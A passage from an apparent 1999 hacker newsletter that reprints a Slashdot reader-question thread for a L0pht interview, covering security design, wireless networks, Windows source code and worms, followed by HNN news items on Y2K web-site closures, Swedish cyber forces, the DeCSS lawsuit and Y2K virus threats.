www.l0pht.org i think.
nope. (Score:0)
by Anonymous Coward on Monday December 27, @05:04PM EST (#151)
some cDc members are in texas, some are in california. One seems to spend a fair bit of time in Canada, although I don't know if he lives there. The l0pht members (including the mudge, who is also a cDc member) live in boston.
The net: strip mall or unlimted human potential? (Score:5, Insightful)
by garagekubrick (domu13@yahoodotcom) on Monday December 27, @12:19PM EST (#26)
(User Info) http://lifs.org.uk
The halcyon days of the net are gone. With ubiquity - the underground vanishes. Is it well on its way, with people like the CEO of Amazon being worshipped by the mainstream press, to becoming an enormous cyber strip mall, marketing tool,
PR exercise in control of perception...

Or is there still an underground? Does it still have a potential to be the one true medium with liberation? Will governments and coroporations end up controlling it? Cause they are winning small, important victories relentlessly...

"I am not a gun"
,,, (Score:2, Interesting)
by Signail11 on Monday December 27, @12:20PM EST (#27)
(User Info)
Considering the availability of easy to use, secure, persistent, pseudoanonymous nyms (http://www.freedom.com) and the increasing role that electronic commerce plays in our economy, what privacy and security concerns do you anticipate
moving to the forefront of attention as this rapidly changing technology evolves?
Actually it's http://www.freedom.net (Score:1)
by LiNT_ on Monday December 27, @01:35PM EST (#77)
(User Info)
See above
IPSEC key debate (Score:1)
by Ruzty on Monday December 27, @12:21PM EST (#28)
(User Info) http://www.moosehead.com/
What is your take on the quashing of the use of photuris, for IPSEC keyserver use over the open to attack isakmp, by the IETF?

"Try to spend the next 30 seconds not thinking about a blue eyed polar bear." -Feodor Dostoevsky
A quickish question (Score:3, Interesting)
by jd on Monday December 27, @12:22PM EST (#30)
(User Info)
The Internet is fragmenting (eg: IPv4 vs. IPv6, Internet 2) and those parts that do have any awareness of security are now beginning to take it seriously (eg: IPSec, SSH). Many other parts are brain-dead, insecure and incoherent.

How do you see things evolving, from this unholy mess?
A question about L0pht constituents: (Score:3, Interesting)
by NateTG on Monday December 27, @12:23PM EST (#31)
(User Info)
What are the non-computer hobbies of the l0pht crew?

I suppose that this is a sort of "celebrety interview" question, but I'm curious.
Name Dropping Asswipes (Score:2, Interesting)
by Anonymous Coward on Monday December 27, @12:24PM EST (#32)
I meet a lot of "white hat" security types in my job. Every so often, I one of these guys goes into name dropping mode and starts talking about how chummy he is with Mudge. Once I had one of them tell me how he had contacts with the "low
fat" guys (although he hadn't heard it pronounced as "loft"). What is it like to have your name(s) dropped by potentially thousands of really cluesless people who you might never even meet?
Somebody else would do this, so I'll do it first (Score:0)
by Anonymous Coward on Monday December 27, @12:26PM EST (#34)
What do you propose as a solution to the whole Q1 OSS cheating debacle?
Human interest stuff (Score:1)
by Errant Knyght (knyght@excite.com) on Monday December 27, @12:27PM EST (#35)
(User Info)
Now I know that Mudge has a painting (can't remember who by) hanging around, and I was wondering what artist everyone at L0pht enjoys as well as composers (if any there are into classical music).
Defensive Design Methodologies (Score:4, Insightful)
by FuriousJester (peterman at the temple of funk) on Monday December 27, @12:29PM EST (#36)
(User Info)
I read something to the gist of this recently:

"The difficulty with computer security is that programmers write code to allow a course of action, not to prevent another. In order
for computer security to become a reality, the design methodology must be changed."

Any programmer worth their check does program defensively. Certain languages support the writing of "safe code" more easily than others. It requires less fore-thought to program defensively in Java than it does in C. The results, however, will
not be as fine tuned.
Any methodology for designing and producing safe code must take this, the experience of those implementing it, the environments the product could be used int, into account. L0pht has compromised many designs. Have you seen any
design/impl (hardware or software) methodologies that yield more secure results than others? Could you give reference to them?

In my experience, it has always been a matter of refinement. Security is relative.

Nuclear weapons can destroy the world, if used properly. -David Byrne
Windows API (Score:3, Interesting)
by IRNI (irni@irni.net) on Monday December 27, @12:31PM EST (#37)
(User Info) http://www.irni.net
If the windows API was opened because of the DOJ trial, what would you do?

A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront.

B) fix everything and tell microsoft so they can make the changes show up in a new release

C) Do A) and grin real big and giggle lots

D) Other | Please Specify ___________________
Re:Windows API - Flawed Logic (Score:1)
by Charlatan (jmutter at ds dot net) on Monday December 27, @04:16PM EST (#143)
(User Info) http://www.freebsd.org/
f the windows API was opened because of the DOJ trial, what would you do?

A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront.

First, I don't understand how exposing specific Windows vulnerabilities would propel 'linux to the forefront'. Your statement doesn't support your conclusion.

Anyhow... (and more on topic with your original post) if you pay attention, every exploit is closely followed by a fix. Exposing weaknesses in Windows would really just help, in the long run, to make it a more viable alternative to UNIX.
Re:Windows API (Score:0)
by Anonymous Coward on Monday December 27, @06:40PM EST (#170)
First I agree with the previous post that exposing weaknesses in windows doesn't have a strong connection to "propelling linux to the forefront". Also if anyone is seeking to find flaws in windows they probably wouldn't stoop that much lower if
they simply decompiled it themselves illegally.
Question: (Score:1)
by sboss (scott at sboss dot net) on Monday December 27, @12:31PM EST (#38)
(User Info)
Do you think there will be any security in the internet of the future? There seems to be more and more security holes (or at least we are finding more). Plus does encryption or digitially signing data help or hender the net?

Thanks
Scott

Scott
C{E,F,O,T}O
sboss dot net
email: scott@sboss.net
Regret / Useful Software / Orwellian CPUs (Score:2, Interesting)
by MattW (ma++@ender.com) on Monday December 27, @12:34PM EST (#40)
(User Info)
I have a couple questions. Choose whatever you like. * The silicon valley is froth with IPOs. A huge opportunity exists even in Boston, if you were attached to the city. Do you regret not putting more into a commercial enterprise that could have
netted you the millions some people are getting? If so, would you trade your fame in this community for it if you could? * L0pht spends an enormous amount of time hacking on other peoples' equipment, cracking and analyzing other peoples'
software. Without meaning to denigrate such useful activities, do you ever want to stop it for a while and dedicate yourself to the creation of something innovative and positive? * Somewhere in the future, drowning in gigahertz, manufacturers
turn to adding security to their CPUs. CPUs have decryption modules which stop the CPU from running any code not specifically signed and encrypted for your CPU. Your machine (or cpu) would come with a disk or cdrom with a public key
you'd provide to vendors (probably on a web page) that would be used to "complete" a build of software that was sold to you, and lock it onto your CPU only. Every piece of software will have a known desination and a known source. Piracy
will be a thousand times harder. Viruses will be wiped out by applying this technology to documents and software alike. Is this the future? * I see the patent situation forcing software to inevitably go one way or the other: it will either be written
only by corporations with tons of money and patents, and be commercial (and by judgement-proof pauper-programmers who have nothing to sue away from them), or the USPTO will suffer through a massive regulation change, and thousands
of software/algorithm/ business-model patents will be swept away, along with more easy way to review a given patent's "nonobvious"-ness. Where do you think this tragedy is headed?
What does L0pht mean? Maybe an answer (Score:1)
by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:35PM EST (#41)
(User Info)
Well I never really put much thought in to it, but here goes. L0pht Heavy Industries. Perhaps it means Low Phat as in Low Fat , Heavily Used as in high speed low drag industries.
Good is never good enough when you dream of being the best.
evolution of the network (Score:1)
by kootch on Monday December 27, @12:35PM EST (#42)
(User Info) http://students.hamilton.edu/1999/dkutcher
with the local networks expanding from one solitary computer, to 20 computers connected in a room, to wireless devices also now able to connect to large databases and networks, how do you see the security industry (is it considered an
industry) responding to these changes and do you forsee any interesting problems arising?
How's the wireless 'net project going? (Score:3, Interesting)
by Anonymous Coward on Monday December 27, @12:35PM EST (#43)
I was digging around the l0pht web site one day and read up on the wireless project you guys were doing trying to make use some old UHF equipment and seeing how far you could spread a free wireless network. So what's the current status
of that project?
pls answer the q above (Score:0)
by Anonymous Coward on Monday December 27, @02:18PM EST (#101)
Just recently on slashdot there was talk of large wireless networks using wavelan. I'm especially interested in hearing about the status of guerilla.net. I'm sure answering the question i'm replying to would further the project and get more people
involved. thanks
Re:How's the wireless 'net project going? (Score:0)
by Anonymous Coward on Monday December 27, @06:25PM EST (#163)
Packet radio systems have existed for years, invented by Radio Amatures, there is nothing new here.

Packet radio networks exist on HF, VHF and UHF. what's new?

Usually the speed of such a network does not exceed 9600baud (kbits/s), especially when using HF, when you transmit your data from one point to another on the globe.
Internet thru packet radio... NOT! (Score:1)
by Inferno (inferno[at]teleport[dot]com) on Tuesday December 28, @03:59AM EST (#204)
(User Info)
The amateur radio packet network is governed by the FCC just like any other amateur radio communications mode. The regulations can be difficult to get around, such as the rule that you MUST have an amateur radio license to transmit
anything on an amateur radio frequency.

This would put a kink in using IRC for one. You would only be able to converse with valid amateurs, which would be impossible to guarantee.

I looked into setting up a wireless amateur radio packet network at school, as I admin a svr that is currently connected to the Internet AND the packet radio network. I couldn't legally use IRC thru the radio link because the folks I would chat
with do not have FCC amateur radio licenses.

'Bout the only thing this would come in handy for would be remote system administration, but then you would have to look at the fact that packet radio is an OPEN mode of communication. Anyone with a TNC and radio receiver would be
able to monitor what was going on. And forget about using SSH or some similiar mode of secure shell access -- the FCC forbids the use of encryption. :(
Question (Score:1)
by Necroleptic (auto33629@hushmail.com) on Monday December 27, @12:39PM EST (#45)
(User Info) http://users.bergen.org/~johsan
What are your opinions on "script kiddies" and your propogation of these people? Don't you believe that people who would want to be hackers should learn through experience, much like yourselves?
Security Lint (Score:3, Interesting)
by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @12:39PM EST (#46)
(User Info) http://cs-sun1.truman.edu/~jyoung/index.htm
For assurance, before installing software on a secure-as-plausible machine, I would love to have an automated for security problems, such as buffer overflows. So, how is the development of SLINT progressing? Are you still planning to release
it?
Re: Security Lint (Score:1)
by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @01:01PM EST (#56)
(User Info) http://cs-sun1.truman.edu/~jyoung/index.htm
Er, that should be "love to have automated scanner".
Welcome, our door is open (Score:2, Interesting)
by lildogie on Monday December 27, @12:40PM EST (#47)
(User Info)
What do you think about the wisdom of linking a planetary network of desktop computers to a radio telescope, hoping to go online with any extra-terrestrial who cares to open our collective port?
Little Dogie
Internet Worm II (Score:4, Interesting)
by tilly on Monday December 27, @12:43PM EST (#48)
(User Info)
Several months ago I began predicting that someday someone would find a buffer overflow in the various Windows TCP-IP stacks and use it to write a worm that would bring down the Microsoft part of the Internet and cause so much traffic
as to effectively shut down everything else. I further predict that until an event of this magnitude happens, the general public will not really learn the basic lessons about security that the *nix world was forced to learn from the first worm.

What are your thoughts on this prediction? (Timeline, reasonableness, etc.)

Regards,
Ben
I miss the old InfoWorld forums. :-(
Re:Internet Worm II (Score:1)
by jesser on Monday December 27, @04:20PM EST (#144)
(User Info) http://www.palosverdes.com/jesse/
windows 95 had at least one buffer overflow exploit.. one had to do with putting fragmented things together. was this hole exploitable for running arbitrary code or only for crashing the box? if the former, why wasn't there a worm?

also.. as an idea for a worm.. how about a worm that opens up port 80 with enough code to exploit known security holes in various versions of msie and netscape plus some silly stuff to make it look innocent, and then IMs everyone (msnim,
aim, icq, yahoo, etc) who's online and tells them to "look at your website"? it could also affect frontpage uploads...

--
Warning: this sig attracts all other sigs with a force proportional to funniness and inversely proportional to distance squared.
Re:Internet Worm II (Score:0)
by Anonymous Coward on Monday December 27, @06:31PM EST (#164)
1. Think of this, Cisco/Bay and other routers running their own stacks, which have probably not been evaluated externally. what if one of them contains an overflow? not even the stack, every router has a few ports open, the code behind them
could have problems aswell. 2. There is this nifty commeercial stack (I forgot the name) which is used in HPUX 11.x, and quite a few embedded and proprietary systems. who knows if it's been evaluated. even if a code has been evaluaded by
people who do know their stuff, after all, these people are human, so, until such a stack doesn't get evaulated by 1million programmers across the planet, for at least a year, it couldn't be considered really safe, even then, see the latest Linux
2.2.12 and below 'blind spoofing' thing.
Re:Internet Worm II (Score:2)
by sinnergy (froggy@eecs.cwru.edu) on Tuesday December 28, @07:36AM EST (#207)
(User Info) http://froggy.raex.com/
You make an interesting point. The problem is, though, that many Unix shops (the small to medium sized ones at least) don't know what the lessons were from the first Worm. I'm only 23 and I learned about it through lore more than anything
else. For everyone's sake, I hope you're not right, but I do believe that a good dose of prevention and education would be in order for most of us Sysadmins. Convincing management of this necessity, though, is almost impossible. With focus
more on the hear and now as opposed keeping an eye out for potential problems, it's hard to keep abreast of security technologies
- CWRUton for Life - (sad but true!)
Re:Internet Worm II (netbus) (Score:0)
by Anonymous Coward on Wednesday December 29, @11:47AM EST (#232)
Well, as 1% or 10% (or ??%) are infected by netbus installations, a worm could simply propagate from one netbus PC to the next. Would be the first worm using a trojan to propagate :-) George
Security and Open Source (Score:0)
by Anonymous Coward on Monday December 27, @12:44PM EST (#49)
Do you believe that it is possible to provide a secure computing model in an open source environment? If so, how?
Proper NT rootkit. (Score:3, Interesting)
by Zurk (zurk@SPAMSUCKSgeocities.com) on Monday December 27, @12:51PM EST (#50)
(User Info)
Hi guys,
Any plans to write a proper Win2K/NT rootkit (the kind that was published on Phrack a while back - that replaces or adds to the actual calls in the win32 ring 0 system with its own) soon ?
Re:Proper NT rootkit. (Score:0)
by Anonymous Coward on Monday December 27, @06:31PM EST (#165)
You write one if you need it so badly, or goto www.rootkit.com, where kids like you can download such stuff.
Re:Proper NT rootkit. (Score:0)
by Anonymous Coward on Tuesday December 28, @03:50PM EST (#219)
you cant get a ring 0 rootkit there or anywhere else dummy.
Simple question (Score:1)
by Ricochet (ncherry@dmc.uucp) on Monday December 27, @12:54PM EST (#51)
(User Info) http://members.home.net/ncherry/
(First the silly question)
Prove your existence :-)

(Now the real question)
How do we get back control of our information?
Re:Simple question (Score:0)
by Anonymous Coward on Monday December 27, @06:33PM EST (#166)
1. already proven, see them at DefCon, Blackhat and other places. 2. We never will, once it's out there, it's on the loose, like a wild animal.
Security? (Score:1)
by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:55PM EST (#52)
(User Info) http://www.digitaldiscipline.com
Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT
and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you?

Rafe

V^^^^V

Opinions expressed by the author may not actually exist in the wild.
Re:Security? (Score:2)
by Chandon Seldon (acorn@gis.net) on Monday December 27, @03:23PM EST (#131)
(User Info) http://www.calug.net/
Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with
it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you?

How I'd go about giving it maximum security.

(Disclaimer: I've never actually set up a server running more than HTTP + FTP + POP3)

1.Partition the machine into the following partitions:
/ (ro)
/home/httpd (ro if possible)
/home/mail (rw)
/home/news (rw)
/home/ftpd (ro if possible)
2.Install the most recent version of OpenBSD
3.Install any security fixes
4.Remove distributed.net's latest client and Q3A
5.Create the following new users: httpd, pop3d, nntpd, ftpd, telnet, unperson, admin
6.Set the permissions for all the files on the machine as strict as possible.
7.Setup a program to forward all requests on ports below 1024 to ports 10000 through 11024.
8.Set each server as it's own user, and make sure that one user can't effect the files of another in any way.
9.Set up each server on standard_port+10000, and have them each store their files in their own partiton (mounted under /home)
10.Use the simplest, most secure server for each task. Yes, this means you can't use apache.
11.Don't allow telnet logins as anyone but admin.
12.Set up the admin account with the minimum set of privilideges nessisary to administer the machine.
13.Go "chown root /bin/chmod; chmod og-rwx /bin/chmod"
14."chmod a-x" any programs that aren't absolutey nessisary to the machine working, like 'su', 'chown', 'fortune', etc.
15.Change your root and admin passwords weekly.
16.Do anything that you should do that I missed.

This should, at best, prevent anyone from messing with the machine at all. At worst, if someone does get in, they shouldn't be able to do anything - anything at all.

-------- The act of censorship is always worse than whatever is being censored. -Chandon Seldon
Re:Security? (Score:1)
by Spamizbad on Tuesday December 28, @02:10AM EST (#201)
(User Info)
How about also getting rid of telnet and using Openssh (included with OpenBSD, no?). Mmm... 128bit encryption.
Re:Security? (Score:0)
by Anonymous Coward on Monday December 27, @06:34PM EST (#167)
Many things can be done, this is not the place to discuss them, why don't you come up with something new? meanwhile, see the StackGuard/PointerGuard/openwall projects.
Slint (Score:2, Interesting)
by Emphyrio (emphyrio@rvdm.op.het.net) on Monday December 27, @12:58PM EST (#53)
(User Info) http://rvdm.op.het.net
According to your site, you have developed a quite powerful source code security analysis tool.
A while ago, this tool was not distributable, and closed source.
Do you plan on releasing Slint and/or other currently closed source L0pht tools in an open source license, or in some other freely distributable binary form ?

Questions (Score:1, Interesting)
by Anonymous Coward on Monday December 27, @01:00PM EST (#55)
I've been checking out the 'L0pht' ever since the days when mudge posted the page up asking how many boxes everyone had up, but anyways...

Is there any work still being done on the 'guerilla net' project? The page hasn't been updated in ages.

Did you guys ever manage to locate the TX ready pin on the WaveLAN cards to switch the amplifier on?

What happened to the user pages on www.l0pht.com?

What are your main development platforms?

...And of course, what's the best piece of equipment you've dug out of the garbage so far?
software liability (Score:0)
by Anonymous Coward on Monday December 27, @01:08PM EST (#57)
hi guys.

when you testified before congress, one of you (I believe it was Weld Pond) said that software manufacturers need a financial incentive to ship secure software. I believe that you went on to say that they should be held partially liable for
damages caused by bugs in their software.

How do you think that legislation like that would affect the open source movement?
Differences in interest (Score:1)
by BlueCalx- (nickd@nickd.org) on Monday December 27, @01:11PM EST (#58)
(User Info) http://nickd.org
Sometimes, corporations are ignorant of your advisories, as they feel the general hacking community is only destructive and has little to offer. It also seems obvious in ABCNews' report that people have an inherent fear of the hacking/cracking
community in general. The intent of some groups (cDc comes to mind) is different from others (gH), and as a result it becomes difficult to create an accurate definition of what hacking/cracking really is.

My question is this: do you feel the negative publicity and stereotypes of hackers and crackers rubs off on l0pht to some extent?

-- BlueCalx | http://nickd.org/
IPv6 (Score:0)
by Anonymous Coward on Monday December 27, @01:12PM EST (#59)
Hi.

Lots of companies are shipping "VPN" solutions that are simply IPv6 boxes. Do you feel that IPv6 is adequate for this purpose? Will IPv6 really prevent the types of attacks we've seen with IPv4?
Please reply to this! (Re:IPv6) (Score:1)
by dibos (krooger@debian.BLOCKSPAM.org) on Monday December 27, @06:41PM EST (#172)
(User Info) http://master.debian.org/~krooger
Good question. I have heard that IPv6 is as insecure as IPv4; I'd like to know more about that.
A Question of Principle (Score:2, Interesting)
by sudog on Monday December 27, @01:12PM EST (#60)
(User Info)
I was not impressed to see L0pht embrace any form of commercial philosophy. While it is true I live in a fairly isolated section of the world, I and the community I live within have the general impression that you are no longer available to the
public. It appears as though you have sequestered yourselves away in your building(s) and sent Mudge out to maintain good PR. What I mean is, aside from the odd security release and product update, you guys seem to have disappeared from
the face of the earth. What are you up to? Are you still truly pursuing the tenet that is listed prominently on your BBS? "Freedom, freedom, blah" -lhi, psalm blah verse blah?

Do you see yourselves as this inaccessible except to people willing to fork over large dollars, or am I just living on the moon?
Re:A Question of Principle (Score:1)
by God I hate mornings (dj_batt at worldnet dot att dot net) on Monday December 27, @01:37PM EST (#80)
(User Info)
I don't think that they're pursing the all mighty dollar. I have contacted them serveral times with hopes of getting them to do some security work for various clients of mine. All had the potential for very nice paychecks at the end. They refused the
work, very politly tho. SO I think you might be a bit off base. But I could be wrong.

GIHM -The light at the end of the tunnel is only the oncoming train.
Capabilities in Linux (Score:1)
by Nemesys on Monday December 27, @01:13PM EST (#61)
(User Info)
Hi - this is a specific question.

Do you think we'll see capabilities begin to replace root in Linux? What will that world be like? When will it happen?
Re:Capabilities in Linux (Score:0)
by Anonymous Coward on Monday December 27, @06:37PM EST (#168)
It will take a long *long* time before such a thing fully merges into the Linux tree. Meanwhile look at www.eros-os.org and pray for them to complete it. If you're really interested, search for documentation on Boeing SNS and Honeywell
SCOMP.
OpenBSD (Score:0)
by Anonymous Coward on Monday December 27, @01:14PM EST (#62)
How secure do you feel linux is? Please compare or contrast this with OpenBSD.
Re:OpenBSD (Score:0)
by Anonymous Coward on Monday December 27, @06:39PM EST (#169)
A lot less, see what the OpenBSD kernel has to offer in terms of security. The usermode code has been also reviewd and made stronger. much less code, more eyes watching it, the result, better security.
Reply to this letter. (Score:5, Funny)
by An0nymousC0ward (president@whitehouse.gov) on Monday December 27, @01:14PM EST (#63)
(User Info) http://www.slashdot.org
This letter was recently published in the columbus dispatch (Ohio's greatest home newspaper....yea right). What would your response be to this person?

Letter to the editor: Opening windows could let bad guys do a lot of damage Saturday, December 25, 1999

I was amazed to see that the Clinton administration, in its initial victory over Microsoft, wants the source code to Windows to be made public. I'm sure it will follow up with a
demand that all banks publish the combinations to their safes and freely distribute keys to both their front and back doors. Perhaps they will make banks install a large button so
visitors can disable all alarms.

Making the world safe for bank robbers would be a lot better than making Windows' source code public. The year 2000 problem is nothing compared to what a hacker could do with the
code to Windows.

The anti-virus software today depends on two primary tests to find a virus: the Cyclic Redundancy Checksum and file size. A virus attaches itself to a program and runs when the
program runs.

Rather than get into a complex technical discussion, let us just say every computer file has a fingerprint. If a virus is attached, the file's fingerprint changes. An anti-virus
program just looks for the fingerprints left by the virus. However, if one has the source code to Windows, a file with a virus can be made with the same fingerprint as a file without
the virus.

Even worse, the operating system, instead of being the virus cop, becomes the virus enabler. Imagine a world where half the people in uniform are trying to rob you and where dialing
911 brings a band of serial killers to your door.

Such a virus would be very, very difficult to fight. Police try to catch such people by tracing who benefits. But when the goal is revenge and not profit, it gets tough to catch the
bad guys. If you think catching the Unabomber was time consuming, this would make the search for the Unabomber look very fast, indeed.

So with the Windows source code, the hacker could write a program that on June 1, 2001, swaps all bank balances. Someone whose name starts with an A gets Z's balances. Throw credit
cards into that mix, and there could be real fun. Maybe some hacker would find it fun to pay off everyone's property taxes. I'll bet everyone who had not paid his tax would tell the
truth and pay up voluntarily, wouldn't they?

Every programmer I have ever met has always left himself a back door into every system he writes. Does anyone want to bet Microsoft does not have a back door to its software? Does
anyone believe that if the judge makes Microsoft publish the source code, Bill Gates would remove the back door before publishing it? He would not dare. The judge might put him in
jail for modifying the code. Couldn't have that now, could we?

If he would leave it in, every highly skilled programmer would have a key to everything running on Microsoft software. We can rest assured that every hacker is totally honest, can't
we? And with the Internet, those hackers would all be in places where Americans are loved, such as Belgrade, Yugoslavia, and Baghdad, Iraq, for example.

Some hacker might even have fun with a newspaper, such as removing the names of everyone who is a subscriber and replacing them with the names of people who are not. Did I mention
court records, employment records, child support records?

All Microsoft bashers in and out of government should beware. It looks like they are going to get what they wished for.

Ray Malone

MBS Software

Chillicothe, Ohio
a real zero.
Re:Reply to this letter. (Score:0)
by Anonymous Coward on Monday December 27, @02:34PM EST (#114)
I'd call him an idiot and get on with things.
Re:Reply to this letter. (Score:0, Offtopic)
by BiLlCaT (neo_at_jay_pee_jay_dot_net) on Monday December 27, @03:27PM EST (#132)
(User Info) http://www.jpj.net/~neo
i blew stewart's threw my nose when i read this. as if anyone could (or would want to) analyze the source for windows. holy christ... just look at the mozilla project. of course the code to MS's TCP stack might be fun to tinker with (not).

l8r.

--bc

@HWA

25.0 AirForce to Close Web Sites Over Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Instead of properly securing public access systems and
remaining vigilant over the New Years holiday the Air
Force has decide to retreat and deny the public its right
to information. Fearing online attacks over the upcoming
holiday they have decided to shut down some public
web sites which they hope will protect them from
attack. (Your web site will have the same holes on New
Years day as it will the day after.)

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_military_web_sites_1.html

Tuesday December 28 2:41 AM ET

Air Force To Close Some Web Sites

By JAMES HANNAH Associated Press Writer

DAYTON, Ohio (AP) - Fearing attacks by computer hackers, some Air Force
bases plan to block access to their public World Wide Web sites over the
New Year's weekend, officials say.

Others bases have been asked to consider closing down their sites temporarily.

``Each one of the Web masters were told they might want to consider any
vulnerabilities,'' Maj. John Anderson, an Air Force spokesman at the Pentagon,
said Monday. For some, he said, that means blocking access at a prime time for
Internet pranks.

Timothy Conley, deputy director of the 88th Communications Group at Wright-
Patterson Air Force Base in Dayton, estimates there are about 30 public Web
sites maintained at the base - from pages for the United States Air Force Museum
to the Air Force Institute of Technology.

The concern, he said, is that hackers emboldened by widespread Y2K computer
concerns could insert viruses that would alter or destroy information on the
sites.

``We feel they may plant some things on servers or e-mail that might go off after
(Jan. 1),'' Conley said.

He said there is no threat to national security because the public-access sites
are separated from secure sites, which will remain operational.

The Pentagon's main Web site should stay operational over the weekend, said
spokeswoman Susan Hansen. Even so, officials there have voiced concern about
attacks from cyberspace, and say special precautions will be taken.

Each of the military services has its own network monitoring stations, and a
centralized Pentagon network monitoring system has been set up in Arlington,
Va.

Jim Neighbors, manager of the Air Force's Y2K program, said any attacks on the
Air Force sites would amount to a nuisance.

``I liken it to somebody going in and defacing a wall with a can of spray paint,
'' he said.

@HWA

26.0 Sweden Plans Cyber Defense and Attack Force 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by erewhon
The Swedish government has issued orders for the
armed forces to train cyber soldiers to protect the
nations infrastructure from attack as well as destroy
hostile systems. (Once again the mainstream media is
months behind the times. HNN reported on this story
back in July.)

Associated Press - via Washington Post
http://www.washingtonpost.com/wp-srv/aponline/19991227/aponline101858_000.htm
(Sorry, link provided a 404 - article unavailable. - Ed)

HNN Archive for July 14, 1999
http://www.hackernews.com/arch.html?071499#3

@HWA

27.0 DVD Industry Files Lawsuit Over DeCSS 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
As reported yesterday by HNN the DVD industry has
filed suit in Santa Clara Superior court against numerous
people (many to be named later) for posting or even
linking to DeCSS. DeCSS is software that can unlock the
encryption scheme for DVD disks which can then be
used to view your movies on your computer it could also
be used to illegally copy DVDs.

Wired
http://www.wired.com/news/business/0,1367,33303,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2414488,00.html?chkpt=zdnntop

Washington Post
http://www.washingtonpost.com/wp-srv/WPlate/1999-12/29/026l-122999-idx.html

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

The legal angle of the DVD Industry's case will hinge on
exactly how the DeCSS software was created and
whether it was truly reverse engineered and if there
was intent to cause harm to the industry.

Wired
http://www.wired.com/news/technology/0,1282,33311,00.html

The hearing has been scheduled for December 29, 1999,
at the Superior Court of the State of California, County
of Santa Clara to determine if a temporary restraining
order should be granted against the named defendants.

PZ Communications
http://www.pzcommunications.com/decss/main.htm

@HWA

28.0 No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The National Infrastructure Protection Center has said
that they have no evidence pointing to a wide scale
cyber attack and so far no serious virus threats have
been discovered. NIPC has said that it does not expect
large-scale U.S. infrastructure disruptions.

NY Times - Registration required. Just give 'em a fake address.
http://www.nytimes.com/library/tech/99/12/biztech/articles/29secure.html

December 29, 1999

Experts Play Down Virus Threat to
Computers Over the Holiday

By JOHN MARKOFF

AN FRANCISCO, Dec. 28 -- Though still maintaining a nervous
vigilance, computer security experts in the government and private
sectors said today that almost no evidence had yet materialized that
hackers or terrorists were plotting widespread disruption of computer
networks over the New Year's weekend.

Since midsummer, concern has been raised,
sometimes with a tone of alarm, that
cybercriminals and political terrorists would mark
the rollover to the new millennium by planting
various kinds of malicious software in networks
and computer systems.

However, very little evidence of such activity has
emerged in recent weeks, and today the
Government's National Infrastructure Protection
Center said that it expected no "large-scale U.S.
infrastructure disruptions" from Year 2000, or
Y2K, computer failures during the next few
weeks. Moreover, because of greatly heightened
surveillance that is planned for computer
networks around the globe on New Year's Eve
and the following days, many experts say that
now would actually be the worst time to try an
attack.

Nevertheless, the federal agency also said it was
preparing for a possible increase in criminal
activity, in part because of heightened media attention to Year 2000
threats.

The agency identified four viruses that it said were of particular concern.
The first three, known as Microsoft Word macro viruses, use a
programming language inside the word processing program to spread
through networks. The fourth, identified as PC CIH, is an older program
that can seriously damage infected machines.

And yesterday an administration official said that despite the fact that no
widespread attacks were expected there is still concern about the potential
for damage from malicious programs.

"The criminal element has latched on to cyberintrusion as a good avenue,"
said the official, who spoke on the condition that he not be identified.
"Obviously, this is an issue of concern."

Kathy Fithen, manager of the Computer Emergency Response Team
Coordination Center at Carnegie-Mellon University, said: "Right now we're
not seeing anything out of the ordinary. For Jan. 1, the biggest thing we
anticipate is computer viruses that have targeted that date to execute."

Last week, the Government official in charge of protecting the nation's
electronic infrastructure said he knew of no documented cases in which
malicious software had been implanted during efforts to fix Year 2000
errors. Earlier this year, various experts had voiced concerns that in the
frenzy to make repairs to software, a few rogue programmers hired as
temporary workers might secretly build in "back doors" that could later be
exploited by criminals to invade networks without setting off computer
security systems.

In July, the Gartner Group, a computer consulting and market research
firm, predicted at least one theft of $1 billion next year directly resulting
from this year's repairs.

The threat alone can be costly. Even if would-be intruders fail to exploit
such a back door, an organization that suspects that its software has been
compromised must assign its best engineers to systematically examine
enormous amounts of code for tiny, hard-to-find alterations.

Bruce Schneier, president of Counterpane Internet Security Inc. in San
Jose, Calif., said such back-door attacks had been extremely rare, and last
week, Richard A. Clarke, the president's national coordinator for computer
infrastructure security and counterterrorism, said the government had not
documented a single such security breach.

This week, Gartner Group's computer security experts acknowledged a
lack of evidence for secret back doors. "I've heard lots of stories," said
William Spernow, the research director for Gartner's information security
strategies group. "But when I have asked for the code, I've gotten
nothing."

One computer security firm that has assessed the added risk from Year
2000-related viruses and security attacks estimated that the odds of a
major "virus event" for the period were about 1 in 14, or 7 percent.

The firm, ICSA.net, also placed odds of a single attacker breaching 100 or
more computer sites over the weekend at 9 percent.

Several antivirus software companies today said that while they would not
rule out the possibility of a widespread destructive event over the weekend,
they had not seen evidence of such viruses yet.

"Nothing happened over Christmas, which may be a pretty good indication
that nothing major will happen on Jan. 1," said Vincent Gullotto, director of
the anti-virus emergency response team at Network Associates, a Silicon
Valley software publisher.

@HWA

